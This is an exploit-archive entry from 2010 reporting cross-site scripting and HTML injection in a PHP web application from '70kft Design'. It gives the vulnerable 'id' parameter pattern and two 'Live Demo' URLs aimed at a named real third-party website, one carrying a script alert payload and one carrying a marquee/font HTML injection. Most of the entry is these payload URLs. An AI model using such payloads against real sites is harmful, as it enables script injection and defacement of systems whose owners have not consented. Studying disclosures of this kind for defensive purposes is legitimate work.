70kft Design Multiple Vulnerabilities

2010-05-23T00:00:00
ID 1337DAY-ID-12363
Type zdt
Reporter XroGuE
Modified 2010-05-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================
70kft Design Multiple Vulnerabilities
=====================================


#########################################
# Name: 70kft Design Multiple Vulnerabilities
# Date: 2010-05-23
# vendor: http://www.70kft.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] XSS Injection Vulnerability:

[+] Vulnerability: http://[site]/[path]/page.php?id=[XSS]

[+] Live Demo: http://www.greatesttheft.com/lessonplan.php?id=<script>alert(/XroGuE/);</script>


###########################################

[+] HTML Injection Vulnerability:

[+] Vulnerability: http://[site]/[path]/page.php?id=[HTML]

[+] Live Demo: http://www.greatesttheft.com/lessonplan.php?id=<marquee><font color=red size=15>XroGuE</font></marquee>

########################################### 



#  0day.today [2018-02-16]  #